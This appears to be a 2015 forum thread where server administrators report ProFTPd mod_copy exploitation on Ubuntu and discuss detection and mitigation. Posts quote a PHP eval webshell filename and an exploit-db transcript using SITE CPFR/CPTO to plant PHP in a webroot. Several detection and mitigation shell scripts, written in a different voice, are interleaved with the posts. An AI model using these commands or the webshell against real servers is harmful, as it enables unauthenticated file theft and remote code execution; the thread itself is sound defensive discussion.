Security issue - ProFTPd 1.3.5

#1 Sat, 11/28/2015 - 12:14
lookwhostalkin

Hi,

Upon a routine look over my Virtualmin box I noticed something very unnerving. Within /tmp sat a file called passwd.copy. Looking into this file I could see it was a copy of my /etc/passwd file.

The file was owned by proftpd and created earlier today:

root@cp:~# stat /tmp/passwd.copy
  File: ‘/tmp/passwd.copy’
  Size: 2776        Blocks: 8          IO Block: 4096   regular file
Device: 13h/19d     Inode: 133879265   Links: 1
Access: (0644/-rw-r--r--)  Uid: (  112/ proftpd)   Gid: (65534/ nogroup)
Access: 2015-11-28 12:42:38.059295568 +0000
Modify: 2015-11-28 12:42:38.059295568 +0000
Change: 2015-11-28 12:42:38.059295568 +0000

Looking into this further I can see it seems to be related to the following exploit:

https://www.exploit-db.com/exploits/36742/

root@cp:~# proftpd -v
ProFTPD Version 1.3.5rc3

People running Ubuntu could be affected by this. I would recommend people check their systems.
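A triage helper to go with the findings in this first post (an added example, not something the poster ran): it lists the files under a directory that are owned by the proftpd uid, flags any that are byte-identical to /etc/passwd like the passwd.copy above, and reports directory entries whose name carries a PHP open tag, which later posts in this thread run into. Uid 112 is the poster's; the usage line assumes a `proftpd` system user exists so that `id -u proftpd` resolves. Sample data in the comments is constructed.

```shell
#!/bin/sh
# Added triage helper, not code from the forum post. It only reads; it changes nothing.
# Run as root, e.g.:  triage /tmp "$(id -u proftpd)"

# files_owned_by DIR UID: regular files under DIR owned by UID (numeric or a name).
files_owned_by() {
    find "$1" -xdev -type f -user "$2" 2>/dev/null
}

# passwd_copies DIR UID [ORIGINAL]: those of the above that are byte-identical
# to ORIGINAL (default /etc/passwd). -exec/-print keeps odd file names intact.
passwd_copies() {
    find "$1" -xdev -type f -user "$2" -exec cmp -s "${3:-/etc/passwd}" {} \; -print 2>/dev/null
}

# names_with_php_tags DIR: entries whose *name* contains "<?php". A file called
# ".<?php ... ?>" in /tmp is the pattern described further down this thread.
names_with_php_tags() {
    find "$1" -xdev -name '*<?php*' 2>/dev/null
}

# triage DIR UID: human-readable summary of the three checks.
triage() {
    printf 'Files under %s owned by %s:\n' "$1" "$2"
    find "$1" -xdev -type f -user "$2" -exec ls -ld -- {} + 2>/dev/null
    printf 'Of those, byte-identical to /etc/passwd:\n'
    passwd_copies "$1" "$2"
    printf 'Entries under %s whose name contains a PHP open tag:\n' "$1"
    names_with_php_tags "$1"
}
```

If passwd_copies prints anything, treat the box as having had unauthenticated read access to /etc/passwd and go on to look for dropped PHP files, not just the copy itself.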

Mon, 11/30/2015 - 10:26
andreychek

Howdy,

That is indeed concerning!

Did you discover whether that problem is fixed in recent Ubuntu ProFTPd packages?

It sounds like one way to be sure is to disable the mod_copy FTP module.

-Eric

Mon, 11/30/2015 - 11:07
lookwhostalkin

Hi Eric,

I am running the most recent version of ProFTPd for my Ubuntu install, which seems to be pretty dated, considering.

I will admit I didn't spend too much time on it; I noticed this issue while getting ready to pack up and leave work for the day. So I simply found the cause of the issue, checked over the system as a whole and didn't find any further issues, then disabled ProFTPd and ensured it wouldn't auto-start.

My "weekend" is spent with the wife and kids, so I haven't touched on this any further as of yet.

I just wanted to get this put out there for anyone else using virtualmin and Ubuntu.

Sat, 12/05/2015 - 05:12
cognosco

My CSF sent me a message that there was a suspicious file in the /tmp directory. The owner was proftpd.

So I did some research and it seems that proftpd is vulnerable. Users could copy files through the system without logging in... I disabled proftpd and closed the ftp ports.

I am shocked. I am running Ubuntu 14.04, with automatic security upgrades. Also I ran updates and upgrades almost weekly, so the system should be up to date. But the most up-to-date proftpd package in Ubuntu 14.04 is the insecure, dangerous version!! I thought my system would be safe on an up-to-date Ubuntu 14.04 LTS. Well, I was wrong.

This is the alert I received:

Time: Fri Dec 4 10:05:39 2015 +0100
File: /tmp/.<?php eval($_REQUEST[cmd]); echo GOOD; ?>
Reason: Suspicious file name
Owner: proftpd:nogroup (112:65534)
Action: No action taken

I could not find the file, or find other traces. I am not sure if this was a logged test, without creating files or damage, or whether it was really exploited. I hope someone can give more information.

Sat, 12/05/2015 - 08:50
lookwhostalkin

"This is the alert I received:

Time: Fri Dec 4 10:05:39 2015 +0100
File: /tmp/.<?php eval($_REQUEST[cmd]); echo GOOD; ?>
Reason: Suspicious file name
Owner: proftpd:nogroup (112:65534)
Action: No action taken"

I would look at doing a search on your system for .php files and check them for the content "echo GOOD".

https://www.exploit-db.com/exploits/36742/

"------------------------------
site cpfr /etc/passwd
350 File or directory exists, ready for destination name
site cpto <?php phpinfo(); ?>
550 cpto: Permission denied
site cpfr /proc/self/fd/3
350 File or directory exists, ready for destination name
site cpto /var/www/test.php

test.php now contains

2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error rewinding scoreboard: Invalid argument
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): FTP session opened.
2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php phpinfo(); ?>' for copying: Permission denied

test.php contains correct php script "<?php phpinfo(); ?>" which can be run by the php interpreter"

The exploit provided within my opening post would suggest that was part of the process they go through when a new .php file is created.

"I am shocked. I am running Ubuntu 14.04, with automatic security upgrades. Also I ran updates and upgrades almost weekly, so the system should be up to date. But the most up-to-date proftpd package in Ubuntu 14.04 is the insecure, dangerous version!! I thought my system would be safe on an up-to-date Ubuntu 14.04 LTS. Well, I was wrong."

It's possible you could find a PPA repo with the latest version of proftpd; however, I have just opted to keep my FTP service disabled.
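Following the search lookwhostalkin suggests, here is an added example (not part of any reply in this thread) that greps a webroot for the strings seen above and pulls the refused SITE CPTO attempts out of proftpd's log, since the quoted exploit shows that every refused cpto leaves the attacker-chosen destination name in the "error opening destination file" log line. The log path /var/log/proftpd/proftpd.log and the webroot /var/www are the Debian/Ubuntu defaults and are assumptions; the sample web files and log lines built by make_fixture are constructed from the text quoted in this thread.

```shell
#!/bin/sh
# Added example, not code from the thread: look for traces of mod_copy abuse in
# two places, PHP files dropped into a webroot and proftpd's own log.

# webshell_candidates DIR: PHP files whose content matches strings seen in this
# thread. A starting point for manual review, not a complete signature set.
webshell_candidates() {
    find "$1" -xdev -type f -name '*.php' -exec \
        grep -l -E 'echo GOOD|eval\(\$_(REQUEST|GET|POST)\[|phpinfo\(\)' {} +
}

# copy_attempts LOGFILE: one "client-ip|destination" line per refused SITE CPTO,
# parsed from lines shaped like the "error opening destination file" one quoted above.
copy_attempts() {
    grep -E "error opening destination file '" "$1" |
        sed -E "s/^.*\[([0-9.]+)\]\): error opening destination file '(.*)' for copying.*$/\1|\2/"
}

# make_fixture: constructed sample data (not from any real host) so the functions
# can be exercised offline. Prints the directory it created.
make_fixture() {
    d=$(mktemp -d)
    mkdir "$d/www"
    printf '<?php eval($_REQUEST[cmd]); echo GOOD; ?>\n' > "$d/www/test.php"
    printf '<?php echo "hello"; ?>\n' > "$d/www/index.php"
    cat > "$d/proftpd.log" <<'EOF'
2015-04-04 02:01:13,159 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): FTP session opened.
2015-04-04 02:01:27,943 slon-P5Q proftpd[16255] slon-P5Q (slon-P5Q.lan[192.168.3.193]): error opening destination file '/<?php phpinfo(); ?>' for copying: Permission denied
EOF
    printf '%s\n' "$d"
}

# Real use (Debian/Ubuntu default paths, assumed; adjust to your layout):
#   webshell_candidates /var/www
#   copy_attempts /var/log/proftpd/proftpd.log | sort | uniq -c
if [ "${1:-}" = "--demo" ]; then
    fx=$(make_fixture)
    webshell_candidates "$fx/www"
    copy_attempts "$fx/proftpd.log"
    rm -rf "$fx"
fi
```

The log only shows the cpto attempts that were refused; a copy that succeeded, like the passwd.copy in the first post, has to be found on disk. Treat every client IP that copy_attempts prints as one that reached the FTP port unauthenticated.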

Tue, 12/08/2015 - 02:33
Welshman

Any more info on this? Seems one of my Ubuntu 14.04 machines has it.

The /.<?php eval($_REQUEST[cmd]); echo GOOD; ?> is a hidden file in /tmp along with passwd.copy.

Chaos Reigns Within, Reflect, Repent and Reboot, Order Shall Return.

Tue, 12/08/2015 - 11:40
lookwhostalkin

Hi Welshman,

I personally have left my FTP service disabled and closed the port off. I am using SCP to move my files to / from the server. FTP access was only ever used by developers who I didn't trust with SCP / SSH access.

I have had a quick look around and been unable to find a PPA with the latest version of proFTPD. I haven't spent that much time on it as I don't need to worry about it to tell the truth.

You may wish to experiment with compiling the latest version yourself; HOWEVER, if you intend to do that I would create a server backup for disaster recovery reasons.

If I get bored and have the time, I may try this myself before the week is out and compile a .deb file if it goes well. I will then update this post. Please keep in mind I make no promises, and if I do get around to it I would always recommend being careful about downloading .debs from unknown / untrusted sources.

Tue, 12/08/2015 - 12:08
Welshman

Disabling FTP is not an option for me as clients need access. What I did was comment out the module in question (mod_copy.c) and restart the service. I even rebooted. I do not think I deleted the 2 odd files, but they seemed to go away? Sorry, not an expert here, but this is a worrying exploit indeed. Why do they not fix it?

Thanks.

Chaos Reigns Within, Reflect, Repent and Reboot, Order Shall Return.
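Welshman's fix, written out as an added example rather than his exact commands: on Debian/Ubuntu, /etc/proftpd/modules.conf loads each DSO module with a "LoadModule mod_xxx.c" line, so commenting out the mod_copy.c line and restarting removes the SITE CPFR/CPTO commands the exploit relies on. The config path, the `service proftpd restart` command and the --apply guard are assumptions about the Ubuntu 14.04 layout; the modules.conf used in the check is constructed.

```shell
#!/bin/sh
# Added example, not Welshman's exact commands: disable mod_copy on the
# Debian/Ubuntu layout. Path and service name are assumptions.

MODULES_CONF=${MODULES_CONF:-/etc/proftpd/modules.conf}

# mod_copy_active FILE: succeed if FILE has an uncommented LoadModule mod_copy.c line.
mod_copy_active() {
    grep -q -E '^[[:space:]]*LoadModule[[:space:]]+mod_copy\.c' "$1"
}

# disable_mod_copy FILE: comment that line out, keeping a timestamped backup.
# Rewritten via a temp file so it behaves the same with GNU and BSD sed.
disable_mod_copy() {
    cp -p "$1" "$1.bak.$(date +%Y%m%d%H%M%S)"
    sed -E 's/^([[:space:]]*)(LoadModule[[:space:]]+mod_copy\.c)/\1# \2/' "$1" > "$1.new" &&
        mv "$1.new" "$1"
}

# apply: the procedure from the post: edit, syntax-check, restart.
apply() {
    if mod_copy_active "$MODULES_CONF"; then
        disable_mod_copy "$MODULES_CONF"
        proftpd -t && service proftpd restart   # -t only tests the config syntax
    else
        echo "mod_copy already disabled in $MODULES_CONF"
    fi
}

if [ "${1:-}" = "--apply" ]; then
    apply
fi
```

After the restart, check from an FTP client that `SITE CPFR /etc/passwd` sent before logging in is rejected with a 5xx reply instead of the 350 shown in the quoted exploit; if it still answers 350, the module was loaded from somewhere other than the file you edited.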

Tue, 12/08/2015 - 12:13
lookwhostalkin

Hi Welshman,

It's possible your system deleted the files within /tmp upon reboot. If you have disabled the module which is the cause of the exploit, you should be fine for the moment.

As for why they didn't fix it, I am sure they did with the latest version. It just seems this version hasn't been passed into the repo for Ubuntu 14.04.

Please be aware this is an OS/Ubuntu issue, not a Virtualmin issue.

Tue, 12/08/2015 - 12:49
Welshman

IRC ubuntu-server

Response :)

proftpd is community maintained; I think no one actually uses it, since no one has prepared updates yet.

???

Another response...

feel free to run vsftpd, which is in main and supported by the ubuntu security team

???

I sometimes wonder if anyone cares!

Chaos Reigns Within, Reflect, Repent and Reboot, Order Shall Return.